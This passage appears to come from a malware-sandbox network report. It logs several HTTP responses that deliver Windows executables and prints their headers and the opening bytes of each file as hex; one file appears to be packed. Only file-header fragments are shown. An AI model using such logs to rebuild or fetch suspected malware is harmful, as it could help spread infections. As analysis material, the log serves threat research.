0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 20:21:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:21:44 GMTContent-Type: application/octet-streamContent-Length: 3272192Last-Modified: Tue, 12 Nov 2024 20:09:03 GMTConnection: keep-aliveETag: "6733b5df-31ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 e8 86 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e0 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6f 6a 70 6e 76 61 00 40 2b 00 00 b0 06 00 00 32 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 71 76 6c 7a 6d 61 00 10 00 00 00 f0 31 00 00 06 00 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 cc 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:21:44 GMTContent-Type: application/octet-streamContent-Length: 3272192Last-Modified: Tue, 12 Nov 2024 20:09:03 GMTConnection: keep-aliveETag: "6733b5df-31ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 e8 86 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e0 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 